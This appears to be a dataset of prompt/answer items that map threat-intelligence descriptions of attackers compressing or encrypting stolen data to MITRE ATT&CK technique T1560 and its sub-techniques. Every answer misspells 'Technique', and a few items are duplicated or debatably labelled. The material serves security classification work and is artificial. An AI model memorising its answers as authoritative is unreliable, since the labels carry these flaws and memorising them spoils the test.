+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Axiom has compressed and encrypted data prior to exfiltration.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has compressed data into .zip files prior to exfiltration.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Following data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration.","Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Ke3chang group has been known to compress data before exfiltration.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has compressed exfiltrated data with RAR and used RomeoDelta malware to archive specified directories in .zip format, encrypt the .zip file, and upload it to C2.","Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has archived victim's data prior to exfiltration.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has manually archived stolen files from victim machines before exfiltration.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork encrypted the collected files' path with AES and then encoded them with base64.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has encrypted files and information before exfiltration.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can encrypt data with 3DES before sending it over to a C2 server.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed has compressed collected data before exfiltration.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has used ZIP to compress data gathered on a compromised host.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT can zip files before exfiltration.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Backdoor.Oldrea writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BloodHound can compress data collected by its SharpHound ingestor into a ZIP file to be written to disk.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can compress data stolen from the Registry and volume shadow copies prior to exfiltration.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cadelspy has the ability to compress stolen data into a .cab file.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chrommme can encrypt and store on disk collected data before exfiltration.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Daserf hides collected data in password-protected .rar archives.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack packs collected data into a password protected archive.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has been observed encrypting the data it collects before sending it to the C2 server.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can ZIP directories on the target system.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic encrypts collected data using a public key framework before sending it over the C2 channel. Some variants encrypt the collected data with AES and encode it with base64 before transmitting it to the C2 server.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Windows automatically encrypts files before sending them to the C2 server.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT encrypts collected data with AES and Base64 and then sends it to the C2 server.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gold Dragon encrypts data using Base64 before being sent to the command and control server.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has encrypted data and files prior to exfiltration.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kessel can RC4-encrypt credentials before sending to the C2.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron contains a function to encrypt and store emails that it collects.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar has encrypted data before sending it to the server.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoFiSe can collect files into password-protected ZIP-archives for exfiltration.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lurid can compress data before sending it.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete stores zipped files with profile data from installed web browsers.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE has the ability to compress archived screenshots.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pillowmint has encrypted stolen credit card information with AES and further encoded it with Base64.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerLess can encrypt browser database files prior to exfiltration.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After collecting documents from removable media, Prikormka compresses the collected files, and encrypts it with Blowfish.","Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proton zips up files before exfiltrating them.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remexi encrypts and adds all gathered browser data into files for upload to C2.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RunningRAT contains code to compress files.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRatReporter used LZ compression to compress initial reconnaissance reports before sending to the C2.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TAINTEDSCRIBE has used FileReadZipSend to compress a file and send to C2.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN encrypts the collected files using 3-DES.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMail can archive files on the compromised host.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET will compress entire ~/Desktop folders excluding all .git folders, but only if the total data size is under 200MB.","Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy has used a method similar to RC4 as well as AES for encryption and hexadecimal for encoding data before exfiltration.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0026, the threat actors used WinRAR to collect documents on targeted systems. The threat actors appeared to only exfiltrate files created after January 1, 2021.","Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors saved collected data to a tar archive.","Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During FunnyDream, the threat actors used 7zr.exe to add collected files to an archive.","Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used the Makecab utility to compress and a version of WinRAR to create password-protected archives of stolen data prior to exfiltration.","Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group archived victim's data into a RAR file.","Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors uses zip to pack collected files before exfiltration.","Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors archived collected files with WinRAR, prior to exfiltration.","Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used 7-Zip to compress stolen emails into password-protected archives prior to exfltration; APT29 also compressed text files into zipped archives.","Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 has used RAR to compress files before moving them outside of the victim network.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used a variety of utilities, including WinRAR, to archive collected data with password protection.","Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has used tools to compress data before exfilling it.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used WinRAR to compress data prior to exfil.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used WinRAR and 7-Zip to compress an archive stolen data.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 created a RAR archive of targeted files for exfiltration.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has used the JAR/ZIP file format for exfiltrated files.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira uses utilities such as WinRAR to archive data prior to exfiltration.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aquatic Panda has used WinRAR to compress memory dumps prior to exfiltration.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has compressed data into password-protected RAR archives prior to exfiltration.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used gzip for Linux OS and a modified RAR software to archive data on Windows hosts.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CopyKittens uses ZPP, a .NET console program, to compress files with ZIP.","Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has used WinRAR to compress stolen files into an archive prior to exfiltration.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has compressed the dump output of compromised credentials with a 7zip binary.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used RAR to compress collected data before exfiltration.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used 7-Zip to archive data.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used WinRAR to compress and encrypt stolen data prior to exfiltration.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gallmaker has used WinZip, likely to archive data prior to exfiltration.","Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has used 7-Zip and WinRAR to compress stolen files for exfiltration.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang is known to use 7Zip and RAR with passwords to encrypt data prior to exfiltration.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used QuickZip to archive stolen files before exfiltration.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used gzip to archive dumped LSASS process memory and RAR to stage and compress local folders.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.","Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used RAR to create password-protected archives of collected documents prior to exfiltration.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sowbug extracted documents and bundled them into a RAR archive.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has leveraged xcopy, 7zip, and RAR to stage and compress collected documents prior to exfiltration.","Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has encrypted files stolen from connected USB drives into a RAR file before exfiltration.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has archived the ntds.dit database as a multi-volume password-protected archive with 7-Zip.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has archived data into ZIP files on compromised machines.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has compressed files before exfiltration using TAR and RAR.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can zip and encrypt data collected on a target system.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CORALDECK has created password-protected RAR, WinImage, and zip archives to be exfiltrated.","Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Calisto uses the zip -r command to compress the data collected on the local system.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crutch has used the WinRAR utility to compress and encrypt stolen files.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Daserf hides collected data in password-protected .rar archives.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky can compress files via RAR while staging data to be exfiltrated.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IceApple can encrypt and compress files using Gzip prior to exfiltration.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole uses WinRAR to compress data that is intended to be exfiltrated.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Micropsia creates a RAR archive based on collected files on the victim's machine.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus has compressed data before exfiltrating it using a tool called Abbrevia.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum was seen using a RAR archiver tool to compress/decompress data.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE compresses collected files with GZipStream before sending them to its C2 server.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY has Gzipped information and saved it to a random temp file before exfil.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has the ability to compress files with zip.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 contains a module for compressing data using ZIP.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerShower has used 7Zip to compress .txt, .pdf, .xls or .doc files prior to exfiltration.","Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can compress data with Zip before sending it over C2.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can compress and archive collected files using WinRAR.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rclone can compress files using `gzip` prior to exfiltration.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian can use WinRAR to create a password-protected archive for files of interest.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WindTail has the ability to use the macOS built-in zip utility to archive files.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ccf32 has used `xcopy \\\c$\users\public\path.7z c:\users\public\bin\.7z /H /Y` to archive collected files.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: certutil may be used to Base64 encode collected data.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: iKitten will zip up the /Library/Keychains directory before exfiltrating it.,"Tecnique: T1560.001 Archive Collected Data: Archive via Utility, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server.","Tecnique: T1560.002 Archive Collected Data: Archive via Library, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has used RAR to compress, encrypt, and password-protect files prior to exfiltration.","Tecnique: T1560.002 Archive Collected Data: Archive via Library, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADFLICK has compressed data using the aPLib compression library.,"Tecnique: T1560.002 Archive Collected Data: Archive via Library, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBSRAT can compress data with ZLIB prior to sending it back to the C2 server.,"Tecnique: T1560.002 Archive Collected Data: Archive via Library, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT applies compression to C2 traffic using the ZLIB library.,"Tecnique: T1560.002 Archive Collected Data: Archive via Library, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis compressed collected data using zlib.,"Tecnique: T1560.002 Archive Collected Data: Archive via Library, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic compresses the collected data with bzip2 before sending it to the C2 server.,"Tecnique: T1560.002 Archive Collected Data: Archive via Library, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb can invoke the `Common.Compress` method to compress data with the C# GZipStream compression class.,"Tecnique: T1560.002 Archive Collected Data: Archive via Library, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream has compressed collected files with zLib.,"Tecnique: T1560.002 Archive Collected Data: Archive via Library, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can use zlib to compress and decompress data.,"Tecnique: T1560.002 Archive Collected Data: Archive via Library, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D scrambles and encrypts data using AES256 before sending it to the C2 server.,"Tecnique: T1560.002 Archive Collected Data: Archive via Library, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SeaDuke compressed data with zlib prior to sending it over C2.,"Tecnique: T1560.002 Archive Collected Data: Archive via Library, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to use the open source libraries XZip/Xunzip and zlib to compress files.,"Tecnique: T1560.002 Archive Collected Data: Archive via Library, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The ZLib backdoor compresses communications using the standard Zlib compression library.,"Tecnique: T1560.002 Archive Collected Data: Archive via Library, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 hex-encoded PII data prior to exfiltration.","Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CopyKittens encrypts data with a substitute cipher prior to exfiltration.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has encoded data gathered from the victim with a simple substitution cipher and single-byte XOR using the 0xAA key, and Base64 with character permutation.","Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used RC4 encryption before exfil.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Lazarus Group malware sample encrypts data using a simple byte based XOR operation prior to exfiltration.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has encrypted documents with RC4 prior to exfiltration.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL compresses output data generated by command execution with a custom implementation of the Lempel–Ziv–Welch (LZW) algorithm.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent.btz saves system information into an XML file that is then XOR-encoded.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor encrypts collected data with a custom implementation of Blowfish and RSA ciphers.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT has encoded data into a binary blob using XOR.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Modules can be pushed to and executed by Duqu that copy data to a staging area, compress it, and XOR encrypt it.","Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FLASHFLOOD employs the same encoding scheme as SPACESHIP for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.","Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb can use a dynamic XOR key and a custom XOR methodology to encode data before exfiltration. Also, FoggyWeb can encode C2 command output within a legitimate WebP file.","Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FrameworkPOS can XOR credit card information before exfiltration.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream has compressed collected files with zLib and encrypted them using an XOR operation with the string key from the command line or `qwerasdf` if the command line argument doesn’t contain the key. File names are obfuscated using XOR with the same key as the compressed file content.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAWKBALL has encrypted data with XOR before sending it over the C2 channel.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole uses a variation of the XOR cipher to encrypt files before exfiltration.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MESSAGETAP has XOR-encrypted and stored contents of SMS messages that matched its target list.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete's collected data is encrypted with AES before exfiltration.,"Tecnique: T1560.003 Archive Collected Data: Archive via Custom Method, Tactic: TA0009 Collection"
